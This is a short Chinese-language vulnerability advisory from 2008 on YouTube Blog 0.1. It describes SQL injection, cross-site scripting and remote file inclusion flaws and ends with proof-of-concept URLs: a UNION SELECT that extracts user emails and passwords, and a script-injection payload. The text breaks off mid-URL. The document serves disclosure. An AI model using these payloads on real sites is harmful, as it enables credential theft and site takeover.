YouTube Blog多个输入验证漏洞

2008-07-23T00:00:00
ID SSV:3707
Type seebug
Reporter Root
Modified 2008-07-23T00:00:00

Description

BUGTRAQ ID: 30345 CNCAN ID:CNCAN-2008072304

YouTube Blog是一款基于PHP的博客程序。 YouTube Blog不正确处理用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意代码或获得目标用户敏感信息。 todos.php脚本对'id'参数缺少过滤,可导致SQL注入攻击。 mensaje.php脚本对'm'参数缺少过滤,可导致跨站脚本攻击。 'cuenta/cuerpo.php'对'base_archivo'参数缺少过滤,可导致远程文件包含,以WEB权限执行任意代码。

Carlos Desseno YouTube Blog 0.1 目前没有解决方案提供: <a href=http://youtubeblog.sourceforge.net/ target=_blank>http://youtubeblog.sourceforge.net/</a>

                                        
                                            
                                                http://www.example.com/ytb/todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+from+ytb_usuarios+where+id=1/*
http://www.example.com/ytb/mensaje.php?m=&amp;lt;script&amp;gt;alert(/xss/)&amp;lt;/script&amp;gt;
http://www.example.com/ytb/cuenta/c